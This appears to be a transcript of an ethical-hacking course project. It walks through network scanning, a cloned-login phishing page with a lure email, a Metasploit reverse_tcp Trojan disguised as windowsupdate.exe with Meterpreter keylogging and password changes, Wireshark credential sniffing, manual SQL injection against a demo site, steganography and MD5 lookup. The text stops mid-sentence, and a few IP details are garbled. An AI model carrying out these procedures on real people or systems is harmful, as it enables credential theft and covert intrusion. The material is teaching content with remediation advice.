Hello, and welcome to the Problem Solutions. This project has been broken down into various tasks, so let's start with the first one, scanning. To determine live systems for sharing the login phishing website, we must first assess the devices connected to our network. For this, we'll scan the LAN network to gather details such as system names, network information, IP addresses, MAC addresses, and other relevant data. Currently, the system is connected to a specific Wi-Fi network. We will scan this network to determine the number of systems connected to it and gather the necessary information. We plan to target one of the victims by obtaining their IP address and then launching a phishing attack on the victim's machine. Before proceeding with these phishing attacks, our initial step is identifying the specific IP address within the network. To accomplish this task, we will utilize a software called Advanced IP Scanner, with which we are already familiar. We will open the Advanced IP Scanner and initiate a network scan to determine the number of machines connected to the network. First, we'll have to check for the IP address. We're currently connected to a Wi-Fi network called HomeHack Airtel 5G. We'll examine the IP address using the command ipconfig. Since we're using a wireless network, we'll navigate to the wireless LAN adapter settings. Here, the IP address is 192.168.1.3, and the default gateway is 192.168.1.1, which is the router's IP address. This reveals that our network operates in the 1. Series. The maximum range is from 192.168.11 to 92.168.1.254. Now, we will open Advanced IP Scanner, which you can download for free. Go to Google, search for Advanced IP Scanner, and download it from advancedipscanner.com. Once downloaded, install it on the machine and open it. Once opened, it will automatically identify your network. If not detected, it will appear empty. In that case, enter the IP address range from 192.168.1.1 to the maximum allowable range, which is 254 for us. Now, search and scan. When you click on a scan, displaying the live systems on that specific network will take some time. It shows you the system names, their IP addresses, the manufacturer, and the MAC address. Let's wait for it to finish. Once it's done, we can view all the connected devices, not just the systems. It will display every electronic device connected to the network. Let's wait for this process to be completed. The process is now complete. You can now observe the number of devices linked to this specific Wi-Fi range. 7 devices are currently connected. Additionally, you'll find an IP address, manufacturer details, and MAC address listed here. All the information is readily accessible. Besides that, there are small icons here. You'll notice an arrow icon. Clicking on it will display any shared folders on this machine. If these folders are public, anyone can access them. Currently, this machine has 3 shared folders, and our target is Vishwa PC. We've identified the system name as Vishwa PC using an advanced IP scanner. The information we gathered includes the system name Vishwa PC, IP address 192.168.1.3, and the MAC address. Make sure to check the MAC address. Copy and paste it. To find out what these shared folders are, right-click on the Vishwa PC, click on Copy, and you will get Share Folders. Paste the shared folder here. These are the shared folders currently on this machine. In this way, an attacker may attempt to collect information about all systems in that network. What can an attacker do with this information? They can perform MAC cloning and MAC spoofing address attacks to obtain an IP address. Once they have the IP address, they can send links to it, along with the system name and shared folder information. If the shared folders are public, the attacker can automatically upload malware into them. This poses a risk if there is no security in place. Let's check if security measures are in place. To do this, we can open an advanced IP scanner, right-click on any folder, and select the Explore option. Upon clicking Explore, you can see it directly opens that specific folder. Alternatively, you can check by pressing Windows R, typing /192.168.1.3, and pressing Enter. Now you can observe these shared folders. If there is no security, they will open directly. If there is some security, we can access any drive, such as D drive or E drive. You can perform several actions here, including copying, deleting, and editing files as needed. This falls under the Advanced IP Scanner Scanning module, a basic scanning module. When you connect to Wi-Fi, you can access all relevant information. We have gathered all the necessary information based on the tasks assigned. This concludes the first task. Our focus now is on the live system. We have identified the live system with the IP address 192.168.1.3, the system name, and the MAC address. Our next objective is to target this system, 1.3, and share the login phishing website. Before getting into the second task, let's quickly recap the first task. In the first task, we used an advanced IP scanner to check who was connected to our network. We identified a potential victim with a specific IP address. And now, moving on to the second task, we're about to create a phishing page. We want to gauge how aware our employees are of phishing attacks. We will first set up an internal phishing website and host it on a separate server before sharing the link with our unsuspecting users. To start, we'll use the WAMP server to transform a regular system into a server. This server will host our phishing website, which is designed to capture login details when someone enters their username and password. Our goal is to collect information about employees accessing this particular website. Once we've gathered that data, we'll compile a list of users who entered their usernames and passwords. This information is crucial for creating awareness among employees. It's our responsibility to inform people about the potential risks. Before we conduct an awareness campaign, we must assess how familiar individuals are with phishing attacks. Furthermore, we need to understand how many people recognize and report these threats and, unfortunately, how many fall for them by clicking on suspicious links. This information is essential for our strategy. It may seem a bit cunning, but it's an important aspect of our cybersecurity responsibilities. Now let's break it down further. We'll use a demo website, demo.testfire.net, which is similar to an online banking system. Think of it as a clone, and to accomplish this, we need a couple of tools: the WAMP server and a web page cloning tool. So, let's get started. First, we need to convert our system into a server. To do so, we need to turn our regular system into a server. For this, we'll use a tool called WAMP server. It's a free tool you can get online and download. As we already have the file on this system, we will directly install it on this machine. Right now, we're running the file to convert the WAMP server system into a normal web server. We go through the usual steps, accepting the license agreement, choosing the installation drive, in this case it's creating a file called WAMP in the C drive, and then clicking on Next, Next, and finally Install. Once it's installed, you'll find an icon on your desktop for WAMP server. As we can see, it's installing all the required software like PHP, Apache, and MySQL. When you double-click and open it, you might notice a red mark, but don't worry, it'll turn green when the server is online. Let's check if the server is online. We'll use this system's IP address, which is 192.168.1.3. When you enter this, you should see a server configuration page confirming that this system has successfully turned into a web server. Now let's move on to hosting the phishing pages. To host these pages, we need a few things. Here are the steps for creating a phishing page. First, we'll clone the login page from the demo website, demo.testfire.net. After cloning, we'll open the HTML file with Notepad to inspect the HTML code. The third step involves obtaining a PHP script to capture login details. You can find the necessary PHP script by downloading it from the internet. Once we're done with the cloning, we have to tweak the HTML code to link it with PHP. How do we do that? Start by searching for the keyword action equals to. Once you've located this keyword, replace the original link with our PHP script file name. There's one more thing we need, an empty text file. This file will be our blank canvas to store the login details of our unsuspecting victim. So, create an empty file specifically for the victim's login details. The seventh step involves capturing the details. These are the simple steps we're going to follow. The first step is to clone the login page using the website demo.testfire.net. You'll find the login page here, resembling an online banking login. Click on it to open the web page. To save this page, right-click, choose View Page, then Save As. Save it to your desktop and create a folder named Demo Phishing. Open the saved file and rename it to Index since the server looks for an index page. This is the home page, so your web page is complete. Save it, and you're done. Now the saved web page is ready, as you can see. Next, we need a PHP file, which you can get from the internet. Just go to Google and search for PHP phishing script. You'll find various websites offering scripts. Choose any of those websites and copy the PHP code you find there. Once copied, open Notepad, paste the code and save it. Rename the file to something like login.txt and make sure to adjust the website for redirection. Then paste the website link in the code, and you're done. Now we're redirecting to the same page again. The idea here is to avoid raising suspicion among the victims. We want them to think it's a normal process, like maybe they entered the wrong password. Now, open the login.txt file. This file will capture variables, storing the user and password values. After that, the script will close the function and exit. To save this PHP script, go to File and then Save As on your desktop under the Demo Phishing folder. Name it capture.php and ensure you select all files before clicking Save. Next, we need an empty text file. On your desktop, right-click and create a new empty text file. Name it Logins to match the file we mentioned earlier, login.txt. We're all set with the 3 files. Now let's get into editing the HTML file using Notepad. Press Ctrl+F to find and look for action equals to. You'll notice a search bar, but we don't need that. What we're finding is method equals to post, so fine-tune the search for that method. You'll see form action equals to do login space method equals to post. This is what we're looking for. It confirms the input login. Here you'll want to replace the original link. Instead, write capture.php to link it with our PHP script. Save the file. What we've essentially done is interconnect everything, HTML with PHP and PHP with the login.txt file. Now copy these files, navigate to the C drive, find the WAMP folder, and head into the www folder. Delete everything that's there by default and paste the files. Once you've done that, check if everything is working. Now it's time to share this link. You'll need to enter the IP address. Here's the link we'll send to our unsuspecting victim. http://192.168.1.3. They could receive this link through Gmail or any other means. Let's say we're using Gmail, for instance. Now we're going to get some random dummy email addresses from TempMail. We're not using any real ones. Let's say this is our victim, the target of our demonstration. From our attacker email account, we're going to compose an email to this victim. The subject will be login verification required. The email can be something like, "Hello user, please click on the link below to confirm your login verification and proceed further with eKYC details." Insert the link, right-click here to verify, and paste the URL, which happens to be our IP address. So just copy-paste, click OK, and send. When we send this, the victim will receive an email. Let's refresh the inbox and wait a few seconds for the new email to pop up. There it is. Login verification required. Click on the link provided to verify. When the victim clicks on the link, it automatically redirects them to the website. Once redirected, the victim will enter their credentials. Let's demonstrate with some dummy credentials. Enter a username and password and click on Login. Now, observe what happens next. It shows the same page again. One might be thinking, did I enter the wrong password? Maybe that's why it's showing this page again. But in reality, this is the original page it redirects to. Initially, it was at 192.168.1.3, but now it's redirected to the actual website. So, the capture is complete. The attacker has successfully captured this information. Let's verify if it's been captured by going to the WAMP www folder and checking the login. Open the text file, and there you have it, the usernames and passwords we just captured. As cybersecurity analysts, our role is to analyze how many people fall for these links and provide their details. This data helps us conduct awareness sessions for employees on phishing risks. And that concludes our second task, checking the awareness level among employees. Let's begin the third task of our project. Here's a quick recap of what we've done so far. We used an advanced IP scanner, got the victim's IP address, executed a phishing attack, and successfully obtained credentials. We've also learned how to raise awareness among employees about these scenarios. Now, let's move on to our next task, system penetration testing. We're going to employ the Nmap tool to scan our network system. This tool will help us identify open ports, running services, and the operating system on the target machine. Once armed with this information, we'll explore Trojan attacks using Metasploit in our next task. First, let's find the Nmap tool online. Just search for Nmap, and you can download it for free. Download the setup, 7.94 setup.exe, and once complete, you'll find it in your Downloads folder. Now, let's install this setup. The process takes a few minutes, and once it's done, you'll spot the Nmap icon on your desktop. So click on Next, Next again, and then Install. Now we are going to search for Nmap and use the ZenMap, which is a graphical user interface. Just open it by clicking on it. Using the advanced IP scanner, let's check how many devices are connected to our network. We'll start by scanning the network. This will provide a list of all the devices connected to our network. From this list, we'll pick a specific device and scan it using Nmap. This will help us identify the open ports, running services, and more. Now we'll wait for the scanning process to complete. It might take a couple of minutes. It's completed, and our target has the IP address 192.168.1.33. We'll copy the IP address and paste it here. Next, we'll perform an intense scan, also known as live scanning. This will scan and reveal all the open ports on the target machine. As you can see, the scan has identified various open ports, such as 135-139, 445-5357, and more. Each port corresponds to specific services running on the machine. The scan also attempts to detect the operating system. It might take a few minutes to complete, and once it's done, we'll have detailed information about the target machine. Now we will begin system network penetration testing on this specific machine. Now, we need to wait, as it's still scanning. Well, now you can see the scanning is done, and if you notice, the Nmap is completed. Further, let's explore the open ports. There are 4 open ports, each hosting different services on this machine. As you observe, you can identify the MAC address of the machine. Similarly, for Intel Corporate, scrolling down reveals the operating system version, its Windows, specifically Microsoft Windows installed on that system. Additionally, there's a desktop name, which essentially serves as the system name. Moving on, further scrolling provides more information. Upon checking, we can see the traceroute information, and we understand its journey and various details. And from our findings, we can confirm these machines are running Microsoft Windows. Now, if I attempt an intense scan with all TCP ports, let's see how many port numbers it reveals. Currently, we've identified only 4 ports. Next, let's delve into the details and determine the total number of ports available. This time, the scan will include all 65,000 ports. In comparison, the initial scan with an intensity of 1,000 ports provided a snapshot. However, an exhaustive scan like this gives us a more comprehensive view. The information obtained becomes crucial for an attacker, providing both the IP address and an extensive list of open ports. This lays the groundwork for potential Trojan attacks. As you can observe, the scan is still ongoing, revealing more open ports, almost 10 ports at this point. We must wait for the scan to complete, as it's giving more ports like 11, 12, 13, and so on. It's a sweep of all 65,000 ports. Once that's done, we'll be ready to move to the next phase of our testing. Now let's make a note of all these details. Our target machine for system penetration testing is a Windows operating system with the IP address 192.168.1.33 of the target machine. We have also obtained the MAC address. Copy the MAC address from ZenMap and paste the MAC address for reference. Additionally, we identified the open ports on this machine, 135 to 7680, and 3 more open ports. Copy and paste it for reference. So, there are a total of 13 open ports. The open ports are 135, 139, 445, 49667, and 5357. Now let's see the services running on these ports. So these are the services running on ports 135, 139, 445, and 5357. Copy it for reference. This information is crucial for an attacker. Once information is received about the port numbers, the attacker will perform system penetration testing. Here, the cybersecurity analyst acts as an attacker. Cybersecurity analysts will perform system penetration and then will report to the system admin to close the open ports. The Nmap tool is crucial for real-time scanning on live machines. It provides information on the operating system, IP addresses, open ports, services, and other devices within the same network. Nmap helps us identify potential vulnerabilities and loopholes by scanning for open ports and other key details. This concludes the third task. Once this phase is complete, we will move on to the next task, which involves exploiting vulnerabilities using the Metasploit framework. Let's get started on Task 4. In Task 3, we found open ports, closed ports, and the OS fingerprinting with the Nmap tool. In this task, we are going to perform system penetration testing on Windows 10 or Windows 11 and see how vulnerabilities can be exploited using Metasploit. Metasploit is one of the tools available in Kali Linux. We are going to use a payload called reverse TCP payload. We'll try to generate a Trojan, execute it on our machines, and check whether it bypasses the administrator privileges. Additionally, we will understand the feasibility of altering the administrator password without prior knowledge of the existing one. The Metasploit Trojan will be examined for its functionalities and potential actions that can be undertaken through its deployment. Once this is done successfully, we will report to a system administrator to fix any issues. Let's get started. To execute the task, we require 2 machines. A target machine equipped with the Kali Linux operating system OS with an integrated Metasploit tool which is inbuilt, and a victim machine that is a Windows 10 machine. Let's look at the steps to perform system penetration testing. The first step is to create the Trojan by using the Metasploit tool with a payload of reverse_TCP. With the payload, we are going to create a Trojan in the Kali Linux OS. Further, we will try to deploy the Trojan file created in the Kali Linux operating system onto the designated Windows machine. Upon successfully executing the Trojan on the victim machine will be vulnerable to a Trojan attack. In the event of vulnerability, the compromised machine establishes a connection with the attacker's machine or the target machine. This connection allows the attacker to execute various actions on the compromised system. So let's get started with this. We require 2 machines. One is the attacker machine, which is the Kali Linux operating system, and this is the victim machine, a Windows 10. Start with Kali Linux and check whether it's connected to a network. To verify the success of the operation, the IP address of the Kali Linux operating system can be confirmed using the ipconfig command. The output will indicate that the IP address is 192.160.125. Here we're going to use a command called msfvenom. msfvenom is a command -p for payload, and we're going to target Windows machines. So type windows/meterpreter/reverse_TCP-f, F for which type of format you want to output. Windows accepts only exe format, which is an executable format. So exe and lhost, where the lhost is equal to 192.168.1.25, with 25 being the Kali Linux operating system. The L port equal to 4444 is the default port number for a Metasploit to open. The -o is the output that we will save under the root directory on the desktop, and a Trojan can be created with any desired name. Here, a name like windowsupdate.exe can be chosen for the Trojan file. Upon pressing enter, malicious.exe file is generated on the desktop, constituting malware. This process requires some time to complete. Once the file is successfully generated, we will open the Metasploit console. While waiting for the Trojan creation, we will verify whether the Windows machine is connected to our network. Now, the file is saved. The Trojan file can be observed on the desktop as a windows.exe file. To open the Metasploit console, the command msfconsole is used. This command is executed alongside the ongoing activities. Simultaneously, we continue to check the IP address of the victim machine through the command prompt. By executing ipconfig on the victim machine, we observe that its IP address is 192.168.1.33. Now, on the attacker machine, we utilize the MSF6 updated version console. We will employ the same commands, specifying the Metasploit framework to use a particular payload, IP address, and port number. To initiate the process, we use the command use exploit multi-handler, activating the multi-handler exploit. Following that, we configure the payload using set payload Windows meterpreter reverse TCP. Therefore, when setting the lhost, it should be configured as set lhost 192.168.1.25 in lowercase letters, and with the correct IP address of Kali Linux machine. Next, we set the port with the command set lport 4444. Following this configuration, we proceed to execute the exploit. Upon beginning the exploit, the system initiates a reverse TCP connection with the handler at IP address 192.168.1.25. Subsequently, our objective is to transfer the Trojan file to a USB drive. We will insert the USB drive into the Kali Linux machine to facilitate the transfer from Kali Linux to the Windows system. This can be done by navigating to the Devices menu, selecting the appropriate USB option, selecting SanDisk, and copying the Trojan file to the connected USB drive. Since the operation is already pending, proceed with opening the USB drive and pasting the required files there. Then, create a new folder named for Demo within the USB drive, paste the files into this folder, and after completion, safely eject the pen drive. Next, navigate the Windows 10 machine, select Devices, choose USB, select SanDisk, and confirm that the SanDisk drive is connected. Open the USB drive and locate the For Demo folder within it. Inside the folder, you will find the Windows file. Now, open the Windows file. Let's say we connected our USB drive to a Windows 10 machine. This drive contains a Trojan file that we created through Metasploit. Now we want to run a Windows Update.exe file on the Windows 10 machine. Let's see what happens when it tries to connect to the attacker's machine. Just press Enter, Windows Update, and then select Yes. Now, observe how it directly connects to the attacker machine. You'll notice that the Metasploit interface is now open. To verify the connection to the correct attacker machine, execute the help command. This command will display a list of available commands on the connected machine, thereby confirming the successful connection and providing access to the available commands. To assess the successful connection and potential bypass of the administrator account, we will proceed with the sysinfo command. This command will provide comprehensive information about the Windows 10 machine, including details like the number of logged-in users. Then we will navigate to the command line to further investigate the status of bypassing the administrator account. To verify the administrator privileges and execute commands with elevated permissions, the get system command will be employed. This command facilitates the elevation of privileges to the local system. Upon successful execution, the status will indicate got system via technique 1, thereby confirming administrator privileges. After that, entering the shell command provides access to the Windows command line within the Metasploit environment. This allows for discrete control and execution of commands on the compromised machine without the user's awareness of the intrusion. To inspect the existing users on the compromised Windows machine, the netuser command will be executed. This command reveals a list of users, including accounts such as administrator, guest, default account, EHAC, and Vishwa. These are the available user accounts. Now, let's change the password of the user, Vishwa. Given the administrator privileges acquired through the getSystem command, we can proceed to change the password of the Vishwa account. Utilizing the netuser command again, we will specify the username, Vishwa, and set a new password without needing the old password. This action is possible because of the elevated privileges granted to the attacker. We will now attempt to change the password directly to 123456789, for example. This password is intended for the Vishwa account. It indicates that the password has been changed without requiring knowledge of the previous password. Furthermore, we aim to access the desktop of the targeted machine. To achieve this, we will navigate to the desktop directory using the commands cd, followed by cd users within the C drive. We can change the directory to the EHAC users folder by using the command cd EHAC, and then proceed to the desktop folder with the command cd desktop. Confirm the contents of the desktop by executing the dir command. The available directories on the system include Microsoft Edge and Nmap link, along with a compressed zip folder visible in the command line. We can create a new folder directly by leveraging the escalated privileges obtained through bypassing. This is achieved by using the command mkdir, followed by the folder name, which, in this case, is Vishwa. Upon execution, the folder is successfully created on the desktop. Additionally, we can navigate to any drive, like the E drive, for example, and employ the dir command to list all directories within that drive. With the escalated privileges, we can edit, add, or delete files as needed. To check the IP address of the Windows machine, the ipconfig command is executed. The resulting IP address is then displayed on the screen. After completing these tasks, we exit the current command prompt. To capture a screenshot of the system, the screenshot command is utilized. The captured screenshot is stored in JPG format in the root folder. Then, we navigate to the root folder and verify the presence of the captured screenshot. We can see here that the same screenshot is available in the root folder. Note that the displayed content mirrors the same information visible in the Windows 10 environment. The victim remains unaware that their system activity is being monitored. In case you're unfamiliar with specific commands, you can execute the help command, which provides a comprehensive list of available commands. Now, we aim to capture keystrokes. For that, execute the command keyscan start. The key scanning process has been initiated. Any input made by a user on this Windows machine, for instance, as a demonstration, open Notepad and enter the text, "This is Vishwanath." Use the command keyscan dump and you can see whatever you entered in the Notepad. This illustrates the method employed to obtain and potentially manipulate usernames and passwords on the compromised system. Also, whenever you open any website and type in the username and password, they can capture this and other information. You have to write a report to a system administrator to fix the issues with all the POCs, along with screenshots explaining where a Trojan will be allowed into the network and how we got access to that machine. The first solution is to block port numbers. The second one is to implement an antivirus. It has to check every file in the system, unused port numbers, and unused services. Everything in the system must be blocked from the firewall. These are the suggestions to be made to system administrators to ensure our network stays safe. Concluding task 4. Let's get started on the next task in the project. Up to this point, we have been engaged in system penetration testing. The task's objective is to capture data packets. Let's understand the problem statement. We will use Wireshark, a tool designed for sniffing networks, to perform a man-in-the-middle attack and obtain usernames and passwords from websites used by internal employees. Consider a simple scenario. An attacker gains access to an office environment by hacking into the Wi-Fi and obtaining access to that network. Attackers use Wireshark, a tool specifically designed to capture data packets that travel through a network. The attacker's objective is to employ Wireshark to analyze data packets and extract information related to the username and password of a specified web application. Let's begin by checking the Wi-Fi connection. We are connected to HomeHack 5G. As mentioned earlier, the intention is to capture the data packets circulating through our network, particularly those passing through the associated firewall. The Wireshark tool is a free tool that can be downloaded by just Googling Wireshark. Click on the first website, which should be https://www.wireshark.org. You can download the tool from the web page. As we are operating on a Windows machine, we will opt for the Windows Intel installer. Download the tool and install it on your machine. After successful installation, navigate to the search bar in your machine, search for Wireshark, and open it. It will prompt you to choose a network to capture. Since we are currently on Wi-Fi, we'll start capturing wireless network connections. Choose the wireless network connection you want to capture. As you can see, something is running here. Now we'll begin the packet capture. An icon denoted by a blue-colored fin symbol serves as the means to the packet capture. Now we're going to open this packet capture in the attacker's machine. The tool is actively capturing all the packets traveling through the designated network. Let's say an individual accesses a web application on their network and enters their personal details into a website, such as demo.testfire.net. Upon entering any username or password on this web application, the specific details can be captured using the packet capture tool. To demonstrate, let's use the website testphp.vulweb.com. Navigating to the profile section, we can enter the username and password, replicating the common experience on various websites. As an alternative example for testing, one might explore an online banking demo website or another site named Aquart. Upon accessing the site, click Sign In. It will ask you to enter login details. For experimental purposes, input random details and verify the functionality of the packet capture process through Wireshark. Observe whether the tool captures the packets generated during this interaction. Entering random details, such as test for both the username and password, proceed to initiate the login by clicking on the login button. Repeat this process for the Aquart site, entering random details there as well. Now, it's logged in, and as attackers, we are going to stop the packet captures. Once we have gathered sufficient information, we will stop capturing packets. What's happening here is essentially a man-in-the-middle attack. Currently, we've executed a man-in-the-middle attack where we've entered the network, captured data packets, and will be able to see the usernames and passwords. Now let's discuss the filtering aspect. A filter for a designated protocol is required, and the chosen protocol is HTTP, given the context of the targeted web application. To execute this filtering, focus on the HTTP protocol. Activating the filter function will result in the display of relevant protocols associated with HTTP, and we can see some HTTP protocol requests within the captured data packets. We will check only for HTTP protocols. Here, you can observe that there is a 200 OK response for the post method. Get methods are also present. We will open them one by one to see what information they will display for us. First, we'll click login.php. You'll notice some text here, Hypertext Transfer Protocol. Open it to find a website named testphp.vulnweb.com. Upon entering the website, an attack takes place. The victim, unaware, opens the website, revealing source and destination ports, along with IP addresses ranging from 192.168.1.3 to the destination IP address, which is the server of a testphp.vulnweb.com website. Next, you'll find the login page within login.php, resulting in a 200 OK response. Check for any responses. If none, proceed to login.jsp. This is demo.txt file. No information is found here either, so we will move to success.txt. No information is here as well. Regarding the post request, the post is nothing but information, like username and password, posted to the web application. Continue to test php.vulnweb.com, where a post request is made. Scroll down to find an HTML form URL encoded. Review the form to discover the username and password. The username and password that the victim submitted will be obtained from the form. Wireshark captures this data, revealing the information of whatever you entered on the websites. The attacker gains access to usernames and passwords, allowing them to log into the websites easily. In summary, by testing the captured data, the attacker confirms the correctness of the username and password. With this, we conclude the fifth task of sniffing a network and obtaining a website's credentials. The sixth task involves verifying the accuracy of the provided username and password. We are going to log into the website using the same credentials obtained from Wireshark. Hack the website by logging in with sniffed login details obtained from Wireshark and then inform the developer. To carry out this task, we will access the same website using the identified domain mentioned in the Wireshark data, which is testphp.vulnweb.com. We proceed to open this website in a separate browser to initiate the login process. Enter testphp.vulnweb.com in the search bar. Upon selecting the Go button, we access the profile page, revealing fields for the username and password. The provided credentials are both test. After entering this information, we click the Login button, successfully gaining access to the account. In the sixth step, the login process using the captured credentials was successfully done. Now, we are writing a report for a developer. In the report, we will highlight the developer's mistake, specifically regarding the username or password provided for a particular web application. The information is stored in clear text. Anyone can access this clear text. It should be encrypted using some algorithms to secure sensitive information. We recommend advising the development team to employ encryption algorithms to safeguard user credentials. Additionally, the system should verify the hash values for enhanced security. Next, it is essential to check the protocol when users input information into a web application or website. Check whether it is HTTP or HTTPS protocol. HTTP, Hypertext Transfer Protocol signifies unsecured, while HTTPS represents Hypertext Transfer Protocol secure, incorporating algorithms to encrypt data. This encryption ensures that even if attackers attempt to sniff the traffic, they would only acquire encrypted versions of the username and password, with no knowledge of the employed encryption algorithm. Decryption becomes a tough ask for attackers, enhancing the security of user data. It is strongly recommended to prioritize the use of HTTPS websites only for data security. These suggestions are integral components of the comprehensive security measures proposed for implementation by developers and system administrators. Along with developers, system administrators play a crucial role in securing both internal and external applications. The job of a system administrator is to regularly check who has logged into the network, whether it's through Wi-Fi or a wired connection. They should compare the logged-in users with specific MAC addresses to identify any unauthorized individuals attempting to access the network. In case of any unknown person trying to enter, they can take measures to block them. The next consideration is to have a Wi-Fi or wired connection different from the internal network. This means creating a guest network for external users to ensure they cannot sniff the internal information. Establishing a distinct network for guests minimizes the risk of outsiders intercepting internal data or traffic. Even if someone attempts to intercept, they won't be able to access internal data as it will be on a separate network. This precaution is crucial to avoid potential issues, as using the same network for both internal employees and external guests can lead to security vulnerabilities. Attackers may exploit such vulnerabilities to target the network and capture sensitive details easily. It is essential to exercise caution in managing network configurations. As an employee and cybersecurity analyst, performing regular testing in a real-time environment is necessary. After this, a comprehensive report should be prepared for the concerned department, outlining the findings and recommendations. With these considerations in mind, let's proceed to the next task. Let's get started with Task 7. In this task, we're focusing on checking database security, specifically looking for vulnerabilities related to SQL injection through websites. Our objective is to determine if data is secure and if we can retrieve information from the website's database. If vulnerabilities exist, we'll report them to the relevant team for resolution. To illustrate this process, we'll be using the demo website testphp.vulweb.com. In this demo website, we will try to check if it fetches any database from the URLs. Now we will browse through all the links or hyperlinks, and you can notice something is being fetched from a URL with a unique ID, indicating that it's pulling data from the database. So if we modify the value, the corresponding data will also be updated. We've just discovered that this is a website connected to a database, fetching information based on unique values. Now, our priority is to check if this database is secured and identify any potential vulnerabilities. To assess the security of this database, we'll start by injecting a single apostrophe as a special character. If this results in an error or a change in the page, it signifies vulnerability. In this case, we can see errors related to MySQL indicate a vulnerability, suggesting data retrieval from the database. Next, we'll attempt to fetch information from the database without knowing the server's username and password, solely by using commands in the URL that are related to MySQL by fetching information in the web application. Now, let's get into the details. To start, we need to determine how many columns exist in the public database. Using the command order_by_one, we receive some information indicating the presence of the first column and second column, which is a good sign. Now, let's randomly check a higher number, say 20. Here, we encounter an error suggesting an unknown column. It's crucial to identify the exact number of columns in public. To find the range, we can check 15. Here we find another error. However, when we investigate between 10 and 15, we discover that some data is returned, pinpointing the range from 10 to 15 as the correct number of columns. Refining our search, we will go up from 10, trying 11 and 12. As you can see, the number 12 triggers an error, indicating that there are 11 columns in the public database. With the knowledge of these 11 columns, the next step is to identify which of these columns are vulnerable. Let's proceed with that. Let's say we want to find out the name of the database. We will use the union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11 command. We're currently trying to identify which columns are vulnerable among the 11 available. Go ahead and press Enter. Now take note of the information we've just obtained, columns 7, 2, and 9. You can choose any of these numerical values, and we'll proceed to extract information from those specific columns. Feel free to pick any one of them. Out of the 11 columns, we've found that 3 are vulnerable. For this demonstration, let's choose column 7. I'll remove the 7, enter some commands, and aim to discover the database name. So I'll type database open bracket, close bracket, and press Enter. Upon executing this, we get the result Accuart as the database name. Now that we have got the database name, we will move towards tables, find the tables within this database. We utilize the command group_concat open bracket table _name close bracket from information_schema.tables as we need tables information. Further, where table_schema equals to database open bracket close bracket fetches information about the tables related to database. Let's see what we get from this query. Now we can see these table names: artist, categories, featured, guestbook, pictures, products, and users. Out of all these table names, our target is to fetch information from the users table. Let's check whether it's working. Now our objective is to find out how many columns are present in the users table and what types of columns are there. Let's proceed to check that. As we're working with columns, we will replace tables with columns. Here you can see tables again, so change it to columns. As we have got names already, type table_name equal to users directly. So if we type name users, it won't give any information as it's related to table's name. And now we'll convert this string into a hex converter. When you use a string to hex converter, you can pick any website from the results and simply type in the table name. For instance, if you type users, you might notice an encoded string. Just copy this encoded string and replace users with the corresponding numerical value. However, it's crucial that the database interprets this as a string. To achieve that, we'll use 0x as a converter, which we need to remember. After clicking on Go, you'll obtain some information. As you can see, these are the columns. What we need from this are the username and password columns. So we'll remove the column name, and at the beginning, we will write uname, pass, phone, email, for example. These are the 4 fields we require directly from the information schema. Let's proceed with the users table. Now, press Enter. Observe the text you've obtained. This demonstrates how attackers can acquire user information. This is a demonstration website, and we retrieve only one set of usernames and passwords. However, in a real-time scenario, you could potentially get a vast list of usernames and passwords directly from the web application. In this case, the username is test, and the password is also test. Additionally, you have the phone number and email address as examples, such as email@email.com. Attackers can exploit this information to attempt unauthorized access and engage in malicious activities. Now the question is, whose mistake is this? To address this, we will be preparing a report for 2 individuals, the website developer and the database administrator. The mistake of the website developer lies in the fact that when any commands are entered in a URL, the web application should not respond. Instead, it should redirect to a page displaying 404 errors. However, in this case, the web application responds, and we receive information directly within the application. This indicates an oversight on the part of the web developer, as special characters are being accepted, and there is no redirection to 404 error pages. The report for the database administrator highlights that the information stored in the database should be encrypted. Currently, the data is stored in clear text, making it easy for attackers to view usernames and passwords. Encrypting the data using secure algorithms is crucial to enhance the security of user credentials. This should be the primary focus for improvement. The second issue is that when end users input commands through the web application, these commands should not execute directly on the database. So 2 critical issues need to be addressed. First, they should implement encryption to secure the stored data. Second, the web application should not execute commands directly from end users. In the report, we will emphasize these 2 points and provide the necessary information to both the developer and the database administrator for their attention. Once they fix it again, we'll conduct the same retesting to confirm whether it has been successfully patched or not. As cybersecurity analysts, it's our responsibility to perform web application penetration testing. Let's begin with the 8th task. This task is also interconnected with task 9. The objective of this task is to extract a WinRAR file from a given image, employing steganography as a means of concealing the file. Following the extraction of the WinRAR file, a text file is revealed within it. Our goal is to extract comprehensive information encompassing email ID, name, phone number, IP address, and other details related to the server user, including passwords, from this text file. Let us look at the image file. This is the image file that we will analyze. Initially, it appears to be a normal image. However, by investigating the source and destination properties, we can identify the presence of a text file, specifically a WinRAR file, hidden within the image. This hidden feature makes it invisible to regular users. To extract the WinRAR file from the image, adhere to the following steps. Double-click on the image. Despite appearing as a typical image, it hides a WinRAR file within. Prior to this, right-click on the image, go to Properties, and under the General tab, ensure the file type is identified as JPEG, and the Open With setting is Windows Photo Viewer. Install the WinRAR application and open the image with it, or right-click on the file and select Open with WinRAR. Within the WinRAR application, locate the image file. In the WinRAR application, go to Open the Archive, and in the Search tab, change All Archives to All Files. Find and select the image file that is encrypted within the text file. Now you will find a text file. Here it is named secret_info. Extract the text file. Click on Extract and click OK. Once the text file is extracted, open it to view information such as username, password, IP address, phone number, and name. Right-click the text file and go to Open With and choose Notepad. When you open this file with Notepad, you can see that there is some data in it. In this data, everything is in encrypted mode. So we have completed the 8th task, which involves extracting the necessary data. This data was extracted from an image file. Specifically, we extracted a text file from a steganographic image. Let's begin with task 9. This task primarily focuses on decrypting the data obtained from the steganography task, specifically targeting the usernames and passwords associated with IP addresses. To accomplish this goal, we intend to utilize several online resources specifically designed for decryption. Moving on to the task, the initial step involves opening the extracted data, navigating to the File menu, and selecting the Save As option. We've chosen to save the data on the desktop. Now, let's proceed by copying every information, including the username, email ID, and phone number. However, we currently face the challenge of understanding the ciphertext, which appears to be encrypted text. Our initial strategy includes making random attempts using online tools and websites. If successful, we aim to reveal the original text and gain valuable insights. Before proceeding, we'll connect to the internet to access these online tools, allowing us to initiate the decryption process and reveal the meaning behind the encrypted data. We confirm internet access through a Google search. Following this, search for online MD5 encryption and decryption tool. Numerous online tools are available, and for this task, we opt for md5hashing.net, a well-known platform for decryption. As we await the decoding process, navigate to the Tools tab, where various hash types are available for decryption. Choose the reverse MD5 decoder, since we need to decode encrypted data to obtain the original text. The first line of data is copied and pasted into the decoder, followed by clicking Decode and agreeing to the terms. This might take a few minutes to decode the data. Successfully decrypting the first piece of data reveals the name David, which is then copied and pasted into a text file. Moving on to the email ID, repeat the process, pasting the encrypted code in the decoder and 